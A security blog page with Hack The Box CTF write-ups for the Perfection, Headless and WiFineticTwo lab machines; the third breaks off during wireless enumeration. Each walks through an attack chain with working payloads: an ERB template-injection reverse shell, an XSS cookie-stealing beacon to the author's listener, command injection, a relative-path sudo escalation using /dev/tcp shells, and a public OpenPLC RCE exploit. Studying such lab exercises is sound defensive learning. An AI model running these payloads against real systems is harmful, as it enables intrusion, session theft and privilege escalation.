Ducksec

I Like

Main Info

About Me

I'm Ducksec and I like

Hi! My name is Ducksec.

Im a Pentester, Ethical Hacker, Security Consultant and animal lover with a passion for securing systems, networks and personal privacy. This blog is a place to post CTF wrtiteups, tips and other articles which I hope will help others as many others have helped me.


15 years experience in IT in a variety of verticals including Aviation and Helathcare, everything from Teir 1 Helpdesk to Sysadmin, Web Developer and now, Security Testing and Consulting. About 70 industry certifications at this point, always learning more.


Cat person, Continues to belive the Crows will win an AFL Grand Final (Maybe not this year...)

HTB and other CTF's

Latest Writeups ( all )

  • Writeups

    Perfection is an easy Linux box from Hack The Box, which showcases both SSTI (Server side template injection vulnerabilities) and gives us an opportunity to play around with hashcat’s lesser used brute force function. Let’s go!

    Gaining user access

    We’ll fire off nmap, and as is often the case we have SSH and a web app on port 80.

    Starting Nmap 7.93 ( https://nmap.org ) at 2024-05-16 03:42 EDT
    Nmap scan report for 10.10.11.253
    Host is up (0.47s latency).
    PORT STATE SERVICE VERSION
    22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    | 256 80e479e85928df952dad574a4604ea70 (ECDSA)
    |_ 256 e9ea0c1d8613ed95a9d00bc822e4cfe9 (ED25519)
    80/tcp open http nginx
    |_http-title: Weighted Grade Calculator
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    Nmap done: 1 IP address (1 host up) scanned in 15.85 seconds
    

    Taking a look at the website, it seems to be a fairly standard site which offers some sort of weighted grade calculation.

    image-20250226133519546

    We can throw some values and and get a response, nothing unusual - there’s also some information about the site author suggesting she might not be the best at secure coding, but this is HTB, we already knew that! Of course, in real life, never do something like that, it’s asking for trouble!

    image-20250226133648179

    The most interesting information which jumps right out is the version powering the site - apparently, it’s “WEBrick 1.7.0

    Let’s use whatweb to get some more information:

    WhatWeb report for http://perfection.htb:80 
    Status   : 200 OK 
    Title   : Weighted Grade Calculator 
    IP     : 10.129.229.121 
    Country  : RESERVED, ZZ 
    
    Summary  : HTTPServer[nginx, WEBrick/1.7.0 (Ruby/3.0.2/2021-07-07)], PoweredBy[WEBrick], Ruby[3.0.2], Script, UncommonHeaders[x-content-type-options], X-Frame-Options[SAMEORIGIN], X-XSS-P
    rotection[1; mode=block]
    

    Given a definite version number it’s always worth checking for an exploit, but I can’t immediately see anything which makes this version vulnerable so lets move on to test the site functionality a bit more.

    A bit more enumeration doesn’t suggest any obvious way forward, so I decide to focus on what we do know - the site is powered by Ruby, which means there’s a good chance some sort of template engine is used to render the HTML pages we’re seeing. It’s also quite likely that there’s some live processing of the submitted values and, if those values are being passed to a script (for example) we might be able to try command injection. Using burpsuite, well try for some generic command injection first - and learn that it looks as if there is some form of input filtering in place.

    image-20240526093920459

    Although this is blocked, we’ve moved forward - we can try to inject here, but to have any success the filtering is going to need bypassed. To explore this, we’ll use the intruder tool of burpsuite:

    image-20240526094505079

    We’ll send a request to intruder, and set an injection point. Then add a payload list and fire them off :

    image-20240526094548225

    The vast majority of requests return a response with a length of 5519, which corresponds to the same error page we saw earlier - therefore, we’re interested in any payload that returns a different length. Eventually we do get one:

    image-20240526095556220

    No error this time, and since this also happens to be a ping payload, let’s throw in our address, fire it off and listen with tcpdump to see if anything comes back:

    
    └──╼ **$**sudo tcpdump -i tun0  
    tcpdump: verbose output suppressed, use -v[v]... for full protocol decode 
    listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes 
    09:53:27.946967 IP 10.10.14.23.38860 > perfection.htb.http: Flags [S], seq 1771576315, win 64240, options [mss 1460,sackOK,TS val 2802174436 ecr 0,nop,wscale 7], length 0 
    09:53:27.971028 IP perfection.htb.http > 10.10.14.23.38860: Flags [S.], seq 1346762632, ack 1771576316, win 65160, options [mss 1340,sackOK,TS val 1614309724 ecr 2802174436,nop,wscale 7], 
    length 0 
    09:53:27.971064 IP 10.10.14.23.38860 > perfection.htb.http: Flags [.], ack 1, win 502, options [nop,nop,TS val 2802174460 ecr 1614309724], length 0 
    09:53:27.971210 IP 10.10.14.23.38860 > perfection.htb.http: Flags [P.], seq 1:735, ack 1, win 502, options [nop,nop,TS val 2802174460 ecr 1614309724], length 734: HTTP: POST /weighted-grad
    e-calc HTTP/1.1 
    09:53:28.006542 IP perfection.htb.http > 10.10.14.23.38860: Flags [.], ack 735, win 504, options [nop,nop,TS val 1614309758 ecr 2802174460], length 0 
    09:53:28.014584 IP perfection.htb.http > 10.10.14.23.38860: Flags [.], seq 1:1329, ack 735, win 504, options [nop,nop,TS val 1614309765 ecr 2802174460], length 1328: HTTP: HTTP/1.1 200 OK 
    09:53:28.014602 IP 10.10.14.23.38860 > perfection.htb.http: Flags [.], ack 1329, win 501, options [nop,nop,TS val 2802174503 ecr 1614309765], length 0 
    09:53:28.014616 IP perfection.htb.http > 10.10.14.23.38860: Flags [P.], seq 1329:1984, ack 735, win 504, options [nop,nop,TS val 1614309765 ecr 2802174460], length 655: HTTP 
    09:53:28.014623 IP 10.10.14.23.38860 > perfection.htb.http: Flags [.], ack 1984, win 496, options [nop,nop,TS val 2802174503 ecr 1614309765], length 0 
    09:53:28.014857 IP perfection.htb.http > 10.10.14.23.38860: Flags [F.], seq 1984, ack 735, win 504, options [nop,nop,TS val 1614309765 ecr 2802174460], length 0 
    09:53:28.014897 IP 10.10.14.23.38860 > perfection.htb.http: Flags [F.], seq 735, ack 1985, win 501, options [nop,nop,TS val 2802174504 ecr 1614309765], length 0 
    09:53:28.041965 IP perfection.htb.http > 10.10.14.23.38860: Flags [.], ack 736, win 504, options [nop,nop,TS val 1614309794 ecr 2802174504], length 0 
    09:53:41.535593 IP 10.10.14.23.56689 > 239.255.255.250.1900: UDP, length 168 
    09:53:42.537585 IP 10.10.14.23.56689 > 239.255.255.250.1900: UDP, length 168 
    09:53:43.538819 IP 10.10.14.23.56689 > 239.255.255.250.1900: UDP, length 168 
    09:53:44.540648 IP 10.10.14.23.56689 > 239.255.255.250.1900: UDP, length 168 
    09:55:41.537187 IP 10.10.14.23.41384 > 239.255.255.250.1900: UDP, length 168 
    09:55:42.538724 IP 10.10.14.23.41384 > 239.255.255.250.1900: UDP, length 168 
    09:55:43.540058 IP 10.10.14.23.41384 > 239.255.255.250.1900: UDP, length 168 
    09:55:44.541586 IP 10.10.14.23.41384 > 239.255.255.250.1900: UDP, length 168
    

    No luck - but we’re getting some interaction - we could probe further, but lets first have a look at SSTI.

    Taking exactly the same approach, this time I’ll use an SSTI wordlist.

    image-20240526103434272

    This time, we get some interesting returns from payloads using the <%= %> format. In fact, the response “invalid query parameters” suggests that this payload tried to execute, but failed due to an incorrect encoding (which the error message is also kind enough to point out). Not having done a lot of templating in Ruby, I take to google and learn that <%= %> is the tag used for embedded Ruby (ERB) - a templating system in Ruby that allows embedding Ruby code within a text document, often used in web applications to generate dynamic content. After a bit of tweaking, I realise the issue with the payload is simply that we’re actually URL encoding too much of the payload with the default settings in intruder - only the key characters need to be encoded, so that this payload:

    %0a<%25%3d+7+*+7+%25>

    …works! No error any more, and no filtering - from here, we simply need to get something more useful out of the SSTI.

    image-20240526104547356

    One of the nice things about SSTI attacks is that once you know which template language you’re working with most of the best payloads tend to be well documented - in this case the easiest reverse shell payload for ERB is <%= IO.popen("bash -c 'bash -i >& /dev/tcp/10.10.14.23/7777 0>&1'").readlines() %>

    All we need to do is substitute this command, and catch the shell.

    susan@perfection:~/ruby_app$ whoami 
    whoami 
    susan
    


    Privilege escalation to root

    Now that we have access as Susan, I’ll grab the user flag and start thinking about how we next we gain root access. Let’s start with sudo -l to see if we can run anything as root.

    susan@perfection:~$ sudo -l 
    sudo -l 
    sudo: a terminal is required to read the password; either use the -S option to read from standard input or configure an askpass helper 
    sudo: a password is required 
    susan@perfection:~$ python3 -c "import pty; pty.spawn('/bin/bash')" 
    python3 -c "import pty; pty.spawn('/bin/bash')" 
    susan@perfection:~$ sudo -l  
    sudo -l  
    [sudo] password for susan: 
    

    We initially get an error because we don’t have a proper terminal session (which is easily fixed with python’s pty.spawn() ), but apparently we’ll need Susan’s password to sudo -l

    So, let’s keep enumerating:

    Within Susan’s home directory, we find a directory labelled “Migration”, and its contents are certainly useful!

    susan@perfection:~/Migration$ ls -lah 
    ls -lah 
    total 16K 
    drwxr-xr-x 2 root  root  4.0K Oct 27  2023 . 
    drwxr-x--- 7 susan susan 4.0K Feb 26 09:41 .. 
    -rw-r--r-- 1 root  root  8.0K May 14  2023 pupilpath_credentials.db 
    susan@perfection:~/Migration$ cat pupilpath_credentials.db 
    cat pupilpath_credentials.db 
    ��^�ableusersusersCREATE TABLE users ( 
    id INTEGER PRIMARY KEY, 
    name TEXT, 
    password TEXT 
    a�\ 
    Susan Millerabeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023fsusan@perfection:~/Migration$ 
    

    When we cat the file, we see what looks very much like a hash - could this be Susan’s password? Let’s copy it to a file, can we crack it with hashcat?:

    hashcat -m 1400 ./hash /usr/share/wordlists/rockyou.txt gives nothing of use, but a bit more digging finds this clue in /var/mail/susan

    susan@perfection:/var/mail$ cat susan 
    cat susan 
    Due to our transition to Jupiter Grades because of the PupilPath data breach, I thought we should also migrate our credentials ('our' including the other students 
    
    in our class) to the new platform. I also suggest a new password specification, to make things easier for everyone. The password format is: 
    
    {firstname}_{firstname backwards}_{randomly generated integer between 1 and 1,000,000,000} 
    
    Note that all letters of the first name should be convered into lowercase. 
    
    Please hit me with updates on the migration when you can. I am currently registering our university with the platform. 
    
    \- Tina, your delightful student
    

    Although this isn’t the key to the castle, it might as well be, because it lets is crack the hash. Let’s run hashcat again, but with a few flags:

    hashcat -m 1400 hash.txt -a 3 susan_nasus__?d?d?d?d?d?d?d?d?d So here, -m 1400 is the type of hash we want to crack -a is for brute-force 3 is for user-defined charset

    and susan_nasus__?d?d?d?d?d?d?d?d?d is the format we need to try, susan forwards, susan backwards and a digit between 1 and 1,000,000,000.

    All hashcat needs to do here is incriment the number each time and check the hash until we find one that matches. This takes a while but we do, eventually, get the password.

    With the password in hand, we can run good old sudo -l again and this time it’s a winner - Susan can run any command on the box as root, so long as you have her password.

    Matching Defaults entries for susan on perfection: 
       env_reset, mail_badpass, 
       secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, 
       use_pty 
    
    User susan may run the following commands on perfection: 
       (ALL : ALL) ALL 
    susan@perfection:~/Migration$ sudo /root 
    sudo /root 
    sudo: /root: command not found 
    susan@perfection:~/Migration$ sudo cat /root/root.txt 
    


    Avoiding the Hack - Lessons learned

    Ok, that was a fun box! SSTI is a vulnerability to watch - as template frameworks have become more popular (and for good reason) exploits against them have become much more of an issue. Like any application, developers need to consider all untrusted data as a possible risk and put proper escaping in place. SSTI can be tricky to find, but exploit payloads are easy to come by once you know which language you’re dealing with.

    The best aspect of this box for me was the hash cracking aspect - aside from getting to use a less-used brute force feature of hashcat, there’s some important takeaways from this part:

    • Don’t re-use passwords, ever.
    • Don’t store any sort of application backup unencrypted, stuff like this happens.
    • Using a name as part of a password is a bad idea, it’s guessable to start with, but also presents a false sense of security. Users think “no one will ever type my name backwards, ‘cause I’d never do that!” - hackers do what we just did. This sort of approach to passwords also leads to imbalanced outcomes based on the arbitrary length of your name - with the format used here, you’d end up with a much weaker password if your name was “Sam” than if your name was “Georgiana”. Your password is much less complex than you think if your name happens to be “Hannah”!
    • Random numbers make no sense as an aspect of a password when random letters, or better, the full alphanumeric spectrum are an option.

    The final issue here is password policy - every organisation should have a formal password policy with specifications on length, complexity and format - but (as this box shows) the policy itself should be treated as sensitive information. Knowing the required format really does make life easier for an attacker. At the same time, the policy must be accessible to users to be of any value. Clear document labelling and categorisation can go a long way here, employees need to be able to recognise a sensitive document (like a password policy) easily and know how they should treat it.

    See you in the next one! :)

  • Writeups

    Headless is an easy box from Hackthebox which is based around some common web security issues - although they’re in less obvious locations which makes the box interesting. Lets get started!

    Gaining user access

    As always, starting with an nmap scan is the way to go:

    PORT STATE SERVICE VERSION
    22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
    | ssh-hostkey:
    |_ 256 2eb90824021b609460b384a99e1a60ca (ED25519)
    5000/tcp open upnp?
    | fingerprint-strings:
    | GetRequest:
    | HTTP/1.1 200 OK
    | Server: Werkzeug/2.2.2 Python/3.11.2
    | Date: Thu, 11 Jul 2024 11:14:39 GMT
    | Content-Type: text/html; charset=utf-8
    | Content-Length: 2799
    | Set-Cookie: is_admin=InVzZXIi.uAlmXlTvm8vyihjNaPDWnvB_Zfs; Path=/
    | Connection: close
    <...SNIP...>
    | <p>Error code explanation: 400 - Bad request syntax or unsupported method.</p>
    | </body>
    |_ </html>
    <...SNIP...>
    Nmap done: 1 IP address (1 host up) scanned in 221.45 seconds
    

    We have SSH, nothing especially interesting there, and Werkzeug, a python based web server on port 5000.

    Let’s take a look at the site - it seems to be a “coming soon” page with a link to a support contact form. Since this is an HTB machine we know there’s going to be a route to exploitation somewhere so of course this is worth checking out, but in the real world a “coming soon” page will often indicate that a site has been put together quite quickly - after all, it’s only going to be there for a while right? This might mean there’s some less than fantastic security choices at play too!

    Before we go any further let’s fire off some directory busting in the background

    ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3- medium.txt:FFUZ -u http://headless.htb:5000/FFUZ -ic

    Now let’s continue…

    image-20240527103048153

    As a good first step, well try for XSS within this form - but the standard payload <script>alert(1)</script> throws an error - it looks like the developers are one step ahead on this one!

    image-20250226112059204

    So, I get nothing from adding this to any of the form fields - but that doesn’t mean we’re done. It’s easy (but dangerous) to forget that any HTTP request can be modified by an attacker with a proxy like burpsuite, and therefore we can also try to inject into HTTP headers themselves. I wonder if the developers have this covered too.

    I like to use the following payload for testing:

    <script>var i=new Image(); i.src="http://10.10.14.34/?cookie="+btoa(document.cookie);</script>

    image-20240527103133533

    This time we do get a response back to my listening server, and we even appear to have a cookie!

    └──╼ **$**sudo python3 -m http.server 80 
    Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 
    10.129.223.91 - - [27/May/2024 10:29:14] "GET /?cookie=aXNfYWRtaW49SW1Ga2JXbHVJZy5kbXpEa1pORW02Q0swb3lMMWZiTS1TblhwSDA= HTTP/1.1" 200 - 
    ^C 
    Keyboard interrupt received, exiting.
    
    

    The cookie is base64 encoded, so let’s decode it:

    ┌─[✗]─[duck**@****Bippy**]─[~/Boxes/htb/boxes/headless] 
    └──╼ **$**echo "aXNfYWRtaW49SW1Ga2JXbHVJZy5kbXpEa1pORW02Q0swb3lMMWZiTS1TblhwSDA=" | base64 -d  
    is_admin=ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0
    
    

    Even better, this looks like an admin cookie!

    Meanwhile, Ffuf has found some pages, one of which is a dashboard:

    [Status: 200, Size: 2799, Words: 963, Lines: 96, Duration: 197ms]
     * FFUZ:
    [Status: 200, Size: 2363, Words: 836, Lines: 93, Duration: 322ms]
     * FFUZ: support
    [Status: 500, Size: 265,
    

    We can pass the back to the application in any number of ways, but I use a simple cookie jar extension for Firefox to edit cookies as required - do this whichever way you prefer. Now, using the admin cookie, we can view the admin dashboard:

    image-20240527103354894

    Note: When I completed this box the admin cookie was returned right away - other users suggest that several cookies should come back and that you might need to wait a while for the admin one to show up.

    We’re given a “generate report” button - and if we hit it, we get a message back saying “systems are up and running” - I wonder what’s going on in the background…

    It’s possible that there’s a well written script performing some checks behind the scenes and returning a pre-defined value, but it’s also possible that some command is just being invoked and the response we’re getting here is queing off the return code. If the latter, we might well be able to inject a command of our own here.

    This is easy to test - I add a &whoami and check that the command still runs:

    image-20240527103626786

    …and it does.

    Nothing bubbles up to the user interface, but since nothing broke it’s reasonable to assume that our code did execute - so, let’s move on and see if we can get a ping back from the target system - we’ll start tcpdump and then add a ping command to our injection point.

    └──╼ **$**sudo tcpdump -i tun0 
    tcpdump: verbose output suppressed, use -v[v]... for full protocol decode 
    listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes 
    10:37:32.594429 IP 10.10.14.34.54272 > headless.htb.5000: Flags [S], seq 2925004892, win 64240, options [mss 1460,sackOK,TS val 4131278173 ecr 0,nop,wscale 7], length 0 
    10:37:32.620299 IP headless.htb.5000 > 10.10.14.34.54272: Flags [S.], seq 545506689, ack 2925004893, win 65160, options [mss 1340,sackOK,TS val 4290847119 ecr 4131278173,nop,wscale 7], len
    gth 0 
    
    <SNIP>
    
    10:38:44.962061 IP headless.htb.5000 > 10.10.14.34.57410: Flags [S.], seq 3408962217, ack 3843608213, win 65160, options [mss 1340,sackOK,TS val 4290919448 ecr 4131350499,nop,wscale 7], le
    ngth 0 
    10:38:44.962088 IP 10.10.14.34.57410 > headless.htb.5000: Flags [.], ack 1, win 502, options [nop,nop,TS val 4131350540 ecr 4290919448], length 0 
    10:38:44.962173 IP 10.10.14.34.57410 > headless.htb.5000: Flags [P.], seq 1:600, ack 1, win 502, options [nop,nop,TS val 4131350541 ecr 4290919448], length 599 
    10:38:44.990350 IP headless.htb.5000 > 10.10.14.34.57410: Flags [.], ack 600, win 505, options [nop,nop,TS val 4290919494 ecr 4131350541], length 0 
    10:38:45.005933 IP headless.htb > 10.10.14.34: ICMP echo request, id 13033, seq 1, length 64 
    10:38:45.005982 IP 10.10.14.34 > headless.htb: ICMP echo reply, id 13033, seq 1, length 64 
    10:38:46.081076 IP headless.htb > 10.10.14.34: ICMP echo request, id 13033, seq 2, length 64 
    10:38:46.081137 IP 10.10.14.34 > headless.htb: ICMP echo reply, id 13033, seq 2, length 64 
    10:38:47.210193 IP headless.htb > 10.10.14.34: ICMP echo request, id 13033, seq 3, length 64 
    10:38:47.210275 IP 10.10.14.34 > headless.htb: ICMP echo reply, id 13033, seq 3, length 64 
    10:38:48.031599 IP headless.htb > 10.10.14.34: ICMP echo request, id 13033, seq 4, length 64 
    10:38:48.031624 IP 10.10.14.34 > headless.htb: ICMP echo reply, id 13033, seq 4, length 64 
    10:38:49.050602 IP headless.htb > 10.10.14.34: ICMP echo request, id 13033, seq 5, length 64 
    10:38:49.050674 IP 10.10.14.34 > headless.htb: ICMP echo reply, id 13033, seq 5, length 64 
    10:38:50.006705 IP headless.htb > 10.10.14.34: ICMP echo request, id 13033, seq 6, length 64 
    10:38:50.006769 IP 10.10.14.34 > headless.htb: ICMP echo reply, id 13033, seq 6, length 64 
    10:38:51.106004 IP headless.htb > 10.10.14.34: ICMP echo request, id 13033, seq 7, length 64 
    10:38:51.106070 IP 10.10.14.34 > headless.htb: ICMP echo reply, id 13033, seq 7, length 64 
    10:38:52.023103 IP headless.htb > 10.10.14.34: ICMP echo request, id 13033, seq 8, length 64 
    10:38:52.023168 IP 10.10.14.34 > headless.htb: ICMP echo reply, id 13033, seq 8, length 64 
    10:38:53.046498 IP headless.htb > 10.10.14.34: ICMP echo request, id 13033, seq 9, length 64 
    10:38:53.046559 IP 10.10.14.34 > headless.htb: ICMP echo reply, id 13033, seq 9, length 64 
    10:38:54.081637 IP headless.htb > 10.10.14.34: ICMP echo request, id 13033, seq 10, length 64 
    10:38:54.081708 IP 10.10.14.34 > headless.htb: ICMP echo reply, id 13033, seq 10, length 64 
    10:38:55.092278 IP headless.htb > 10.10.14.34: ICMP echo request, id 13033, seq 11, length 64 
    10:38:55.092348 IP 10.10.14.34 > headless.htb: ICMP echo reply, id 13033, seq 11, length 64
    

    image-20240527103943114

    There you go - ICMP echo request, our ping command worked! We can now inject commands and make the box initiate a connection. From here we can get a shell quite easily. I encode a basic bash shell in base64, then pass this to base64 -d and finally to bash which executes it. This isn’t much more complicated than a standard payload but cuts out a lot of possible messing around with escaping.

    image-20240527104148762

    We’ll start a listening server….and we’re in!

    └──╼ **$**nc -nvlp 7777 
    listening on [any] 7777 ... 
    connect to [10.10.14.34] from (UNKNOWN) [10.129.223.91] 60562 
    bash: cannot set terminal process group (1166): Inappropriate ioctl for device 
    bash: no job control in this shell 
    dvir@headless:~/app$ whoami 
    whoami 
    dvir 
    dvir@headless:~/app$ 
    


    Privilege escalation to root

    As always in a Linux environment, start with good old sudo -l - who knows, we might just be able to sudo su and be done with it…

    dvir@headless:~$ sudo -l 
    sudo -l 
    Matching Defaults entries for dvir on headless: 
       env_reset, mail_badpass, 
       secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, 
       use_pty 
    User dvir may run the following commands on headless: 
       (ALL) NOPASSWD: /usr/bin/syscheck
    

    Well, no sudo su but we can run whatever syscheck is as root - and I’m willing to bet it’s a bash script which is what the “Generate report” button is actually invoking.

    A quick file command confirms that syscheck is a custom bash script:

    dvir@headless:~$ file /usr/bin/syscheck 
    file /usr/bin/syscheck 
    /usr/bin/syscheck: Bourne-Again shell script, ASCII text executable
    

    Let’s look at the script then :)

    \#!/bin/bash 
    
    if [ "$EUID" -ne 0 ]; then 
      exit 1 
    fi 
    
    last_modified_time=$(/usr/bin/find /boot -name 'vmlinuz*' -exec stat -c %Y {} + | /usr/bin/sort -n | /usr/bin/tail -n 1) 
    formatted_time=$(/usr/bin/date -d "@$last_modified_time" +"%d/%m/%Y %H:%M") 
    /usr/bin/echo "Last Kernel Modification Time: $formatted_time" 
    
    disk_space=$(/usr/bin/df -h / | /usr/bin/awk 'NR==2 {print $4}') 
    /usr/bin/echo "Available disk space: $disk_space" 
    
    load_average=$(/usr/bin/uptime | /usr/bin/awk -F'load average:' '{print $2}') 
    /usr/bin/echo "System load average: $load_average" 
    
    if ! /usr/bin/pgrep -x "initdb.sh" &>/dev/null; then 
      /usr/bin/echo "Database service is not running. Starting it..." 
      ./initdb.sh 2>/dev/null 
    else 
      /usr/bin/echo "Database service is running." 
    fi 
    
    exit 0
    
    

    The script first verifies that the script is running with root privileges. It then retrieves the last modification time of the kernel, the available disk space, and the system load average - not too interesting. Finally, however, it checks if the “initdb.sh” process is running, and if not, it starts the database service - since the script runs as root, “initdb.sh” should aslso be run as root.

    As it stands, initdb isn’t running - and per the script it should be located in /usr/bin - it isn’t!:

    dvir@headless:~$ /usr/bin/pgrep -x "initdb.sh" 
    /usr/bin/pgrep -x "initdb.sh" 
    
    dvir@headless:~$ ls /usr/bin | grep init 
    ls /usr/bin | grep init 
    lsinitramfs 
    unmkinitramfs 
    xinit
    

    So, this means any script called “initdb.sh” that we placed in /usr/bin would in theory be run as root. Unfortunately, we don t have permission to write to /usr/bin/ - but do we need it?

    There’s a potential vulnerability with using a relative path in bash scripts which comes into play here. Specifically, using a relative path for initdb.sh can be problematic if the script is executed from a different directory then intended. Let’s say I run the script from the directory /tmp - now, the directory referenced by ./initdb.sh isn’t /usr/bin/initdb.sh, but rather /tmp/initdb.sh - don’t forget that ./ just means “in the current directory - “ therefore, if an attacker places a malicious initdb.sh in the working directory, it could be executed instead of the intended script. And that’s exactly what we’ll do to root this box. We’ll simply add a basic reverse shell to a bash script in a directory I can write to tmp, call it “initdb.sh” make it executable and then run the syscheck script as root from this location:

    dvir@headless:/tmp$ echo "/bin/bash -i >& /dev/tcp/10.10.14.34/7778 0>&1" > initdb.sh 
    
    dvir@headless:/tmp$ cat initdb.sh 
    
    /bin/bash -i >& /dev/tcp/10.10.14.34/7778 0>&1 
    
    dvir@headless:/tmp$ chmod +x initdb.sh 
    
    dvir@headless:/tmp$ sudo /usr/bin/syscheck 
    sudo /usr/bin/syscheck 
    Last Kernel Modification Time: 01/02/2024 10:05 
    Available disk space: 2.0G 
    System load average:  0.04, 0.01, 0.00 
    Database service is not running. Starting it...
    
    
    

    And back on my attack box, catch the shell

    root@headless:/tmp# whoami 
    whoami 
    root 
    root@headless:/tmp# cat /root/root.txt 
    cat /root/root.txt 
    

    …and were done!

    Avoiding the Hack - Lessons learned

    So let’s now take a look at the vulnerabilities we found, and how they could have been avoided.

    This was a fairly typical web app sort of box - the first vulnerability wasn’t unusual, but is a good reminder that just because a user is not intended to set HTTP headers, this does not mean they can’t. Never forget that malicious actors don’t tend to do what they’re supposed to do!

    The second issue is a specific point for anyone who works with Linux, think very carefully about the use of relative paths - sometimes you do need to use them, sometimes using them is much more sensible than choosing absolute paths and having to do a bunch or re-writes at some point (eg. in a web app), but if you don’t really need them it’s best to pin things down and give an absolute path.

    See you in the next one!

  • Writeups

    Jul 07, 2024 by Ducksec

    WiFineticTwo Writeup

    WifineticTwo is a medium difficulty Linux machine that features vulnerabilities in OpenPLC and a WPS attack which is especially interesting for a HTB machine! Let’s dive in!

    Gaining user access

    Since this box is based more around a hardware scenario we (unusually for HTB) don’t find anything on port 80 - so lets fire off quick nmap to see what else exists!

    PORT STATE SERVICE VERSION
    22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux;
    protocol 2.0)
    | ssh-hostkey:
    | 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
    | 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
    |_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
    8080/tcp open http-proxy Werkzeug/1.0.1 Python/2.7.18
    | http-title: Site doesn't have a title (text/html; charset=utf-8).
    |_Requested resource was http://10.10.11.7:8080/login
    <...SNIP...>
    

    Well, there’s not too much here, but we do find a web server on 8080 - its Werkzeug which tells us python, but not much else. Que some visual inspection and I find that OpenPLC is running here.

    image-20240527094153823

    OpenPLC is an exciting open-source project which allows you to program and control industrial equipment, like PLCs (Programmable Logic Controllers), using a simple and intuitive interface. In theory this is great - reducing barriers to entry in industries which are generally closed-source dominated can be highly beneficial - OpenPLC for example, makes it easy to create custom automation solutions that streamline processes and boost productivity without building a solution from scratch. At the same time, the guys over in industrial automation aren’t always security focused, and, as a result…

    image-20240527094554719

    Yes, I’m afraid just like that, we are in! From a security perspective this is already a disaster, the default user has rights to run programs, and upload new ones, so can we write one which will give us a shell…

    image-20240527094637879

    In fact, this time around we don’t even need to, because Fellipe Oliveira already did a great job here: https://github.com/thewhiteh4t/cve-2021-31630

    --- CVE-2021-31630 ----------------------------- 
    --- OpenPLC WebServer v3 - Authenticated RCE --- 
    \------------------------------------------------ 
    
    [>] Found By : Fellipe Oliveira 
    [>] PoC By  : thewhiteh4t [ https://twitter.com/thewhiteh4t ] 
    
    [>] Target  : http://10.129.223.213:8080 
    [>] Username : openplc 
    [>] Password : openplc 
    [>] Timeout  : 20 secs 
    [>] LHOST   : 10.10.14.34 
    [>] LPORT   : 7777 
    
    [!] Checking status... 
    [+] Service is Online! 
    [!] Logging in... 
    [+] Logged in! 
    [!] Restoring default program... 
    [+] PLC Stopped! 
    [+] Cleanup successful! 
    [!] Uploading payload... 
    [+] Payload uploaded! 
    [+] Waiting for 5 seconds... 
    [+] Compilation successful! 
    [!] Starting PLC...
    
    
    
    └──╼ **$**nc  -nvlp 7777 
    listening on [any] 7777 ... 
    connect to [10.10.14.34] from (UNKNOWN) [10.129.223.213] 40344 
    bash: cannot set terminal process group (177): Inappropriate ioctl for device 
    bash: no job control in this shell 
    root@attica01:/opt/PLC/OpenPLC_v3/webserver# whoami 
    whoami 
    root 
    root@attica01:/opt/PLC/OpenPLC_v3/webserver# 
    

    The exploit really just uploads some C code and executes it, but the C shell included is non blocking and spawns in the background which is nice! :)

    From here we can change to the root directory and get the user flag - user because of course this is actually a container, which we now need to get out of:

    root@attica02:/# cat /proc/1/environ
    container=lxccontainer_ttys=
    

    Privilege escalation to root

    I enumerated this box for a while, but the only thing which really jumps out is the presence of a wireless LAN interface, which is:

    1 - Sort of unusual in a container

    2 - Clearly related to the name of the box (Serious point here, CTFs are often a bit contrived so it’s certainly not cheating to use any context clues you’re given!)

    ip addr 
    1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 
       link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 
       inet 127.0.0.1/8 scope host lo 
        valid_lft forever preferred_lft forever 
       inet6 ::1/128 scope host  
        valid_lft forever preferred_lft forever 
    2: eth0@if18: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000 
       link/ether 00:16:3e:fc:91:0c brd ff:ff:ff:ff:ff:ff link-netnsid 0 
       inet 10.0.3.2/24 brd 10.0.3.255 scope global eth0 
        valid_lft forever preferred_lft forever 
       inet 10.0.3.52/24 metric 100 brd 10.0.3.255 scope global secondary dynamic eth0 
        valid_lft 2345sec preferred_lft 2345sec 
       inet6 fe80::216:3eff:fefc:910c/64 scope link  
        valid_lft forever preferred_lft forever 
    5: wlan0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc mq state DOWN group default qlen 1000 
       link/ether 02:00:00:00:02:00 brd ff:ff:ff:ff:ff:ff
    

    So we have a wireless interface, but its currently in the down state, meaning we’re not connected to anything - can we find any wireless networks to connect to? iw list says yes!:

    wlan0 Scan completed :
    Cell 01 - Address: 02:00:00:00:01:00
    Channel:1
    Frequency:2.412 GHz (Channel 1)
    Quality=70/70 Signal level=-30 dBm
    Encryption key:on
    ESSID:"plcrouter"
    Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
    9 Mb/s; 12 Mb/s; 18 Mb/s
    Bit Rates:24 Mb/s; 36 Mb/s; 48 Mb/s; 54 Mb/s
    Mode:Master
    

